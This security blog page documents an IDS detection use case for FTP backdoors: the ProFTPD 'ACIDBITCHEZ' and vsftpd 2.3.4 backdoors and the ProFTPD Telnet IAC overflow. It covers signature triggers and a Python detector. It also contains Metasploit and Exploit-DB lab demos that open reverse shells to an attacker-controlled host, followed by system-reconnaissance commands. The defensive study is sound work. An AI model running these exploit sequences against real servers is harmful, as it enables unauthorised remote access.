Tag Archives: FTP

SUC028 : ProFTPD Backdoor Inbound Backdoor Open Request (ACIDBITCHEZ)

  • Use Case Reference : SUC028
  • Use Case Title : ProFTPD Backdoor Inbound Backdoor Open Request (ACIDBITCHEZ)
  • Use Case Detection : IDS / FTP logs
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Identified tool(s) : Metasploit, Nessus, scripts, etc.
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 21/TCP

Possible correlation(s) :

  • Pen-testing tools or home made scripts

Source(s) :

  • ProFTPD Backdoor demo

Emerging Threats SIG 2011994 triggers are :

  • The FTP content must contain “HELP ACIDBITCHEZ”, which is the backdoor command.
  • The source port can be any port from EXTERNAL_NET, with a destination of HOME_NET port 21/TCP.
SIG 2011994 1 year events activity

OSVDB-69562 : ProFTPD 1.3.3c Backdoor Command Execution

Timeline :

Public disclosure of the backdoor presence on 2010-12-01
Metasploit PoC provided on 2010-12-02

PoC provided by :

MC
darkharper2

Reference(s) :

OSVDB-69562

Affected version(s) :

proftpd-1.3.3c archives downloaded between 2010-11-28 and 2010-12-02

Tested on Ubuntu 10.04 LTS with :

proftpd-1.3.3c patched with diff

Description :

This module exploits a malicious backdoor that was added to the ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz] archive between November 28th 2010 and 2nd December 2010.

Commands :

use exploit/unix/ftp/proftpd_133c_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit

id
uname -a
ifconfig

vsftpd v2.3.4 Backdoor Command Execution

Timeline :

Backdoor discovered by Mathias Kresin
Source code corrected on 2011-07-03
Metasploit exploit released on 2011-07-04

PoC provided by :

hdm
mc

Reference(s) :

OSVDB-73573
Diff Pastebin
vsftpd alert

Affected version(s) :

vsftpd-2.3.4 archives downloaded between 2011-06-30 and 2011-07-03

Tested on Ubuntu Lucid 10.04.1 LTS with :

vsftpd-2.3.4

Description :

This module exploits a malicious backdoor that was added to the vsftpd download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.

Commands :

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit

id
uname -a

CVE-2010-3867 : ProFTPD IAC Remote Root Exploit

Timeline :

Vulnerability reported to the vendor by ZDI on 2010-09-24
Coordinated public release of the advisory on 2010-11-02
Metasploit exploit released on 2010-11-05
Exploit-DB exploit released on 2010-11-07

PoC provided by :

jduck for Metasploit exploit
Kingcope for Exploit-DB exploit

Reference(s) :

CVE-2010-3867
EDB-15449

Affected version(s) :

ProFTPD versions between 1.3.2rc3 and 1.3.3b

Tested on Debian Squeeze with :

ProFTPD proftpd-basic_1.3.3a-4_i386.deb

Description :

This module exploits a stack-based buffer overflow in versions of ProFTPD server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a large number of Telnet IAC commands, an attacker can corrupt memory and execute arbitrary code.
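The two detection points on this page (the ET SIG 2011994 triggers for the ProFTPD backdoor above, and the "large number of Telnet IAC commands" that characterises CVE-2010-3867) can be checked on reconstructed FTP command lines. The following is an added example written for this page, not code from Emerging Threats or Metasploit; HOME_NET and the IAC threshold are assumptions, and the sample records are constructed.

```python
import ipaddress

# Assumed local address space; substitute your own HOME_NET.
HOME_NET = [ipaddress.ip_network("192.168.178.0/24")]
# Heuristic threshold for the CVE-2010-3867 check (an assumption, not from the page):
# a legitimate FTP command line rarely carries more than one or two IAC bytes.
IAC_THRESHOLD = 8
IAC = 0xFF  # Telnet "Interpret As Command" byte


def in_home_net(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in HOME_NET)


def inspect_ftp_command(src_ip, dst_ip, dst_port, payload):
    """Return the alert names raised for one FTP control-channel command line.
    Mirrors the SIG 2011994 direction logic: EXTERNAL_NET -> HOME_NET port 21/TCP."""
    alerts = []
    if dst_port != 21 or in_home_net(src_ip) or not in_home_net(dst_ip):
        return alerts  # wrong direction or port: the rule does not apply
    if b"HELP ACIDBITCHEZ" in payload:
        alerts.append("ET 2011994 ProFTPD backdoor open request")
    if payload.count(IAC) >= IAC_THRESHOLD:
        alerts.append("Possible CVE-2010-3867 Telnet IAC flood")
    return alerts


# Constructed sample records: (src_ip, dst_ip, dst_port, raw command bytes).
SAMPLE_RECORDS = [
    ("203.0.113.5", "192.168.178.40", 21, b"USER anonymous\r\n"),
    ("203.0.113.5", "192.168.178.40", 21, b"HELP ACIDBITCHEZ\r\n"),
    ("198.51.100.9", "192.168.178.40", 21, b"\xff" * 40 + b"\r\n"),
    ("192.168.178.21", "192.168.178.40", 21, b"HELP ACIDBITCHEZ\r\n"),  # internal source
    ("203.0.113.5", "192.168.178.40", 2121, b"HELP ACIDBITCHEZ\r\n"),   # non-standard port
]


def scan(records):
    """Run every record through the inspector and collect (source, alert) pairs."""
    return [(r[0], alert) for r in records for alert in inspect_ftp_command(*r)]


if __name__ == "__main__":
    for src, alert in scan(SAMPLE_RECORDS):
        print(f"{src}: {alert}")
```

The last two sample records match the backdoor string but fall outside the rule's direction and port scope, which is why a port-21-only signature misses a ProFTPD instance bound elsewhere.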

Metasploit Demo :

use exploit/linux/ftp/proftp_telnet_iac
set RHOST 192.168.178.40
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid
ipconfig

Exploit-DB demo :

nc -lvn 45295
perl proftpd_iac.pl 192.168.178.40 192.168.178.21 5
id
uname -a
ifconfig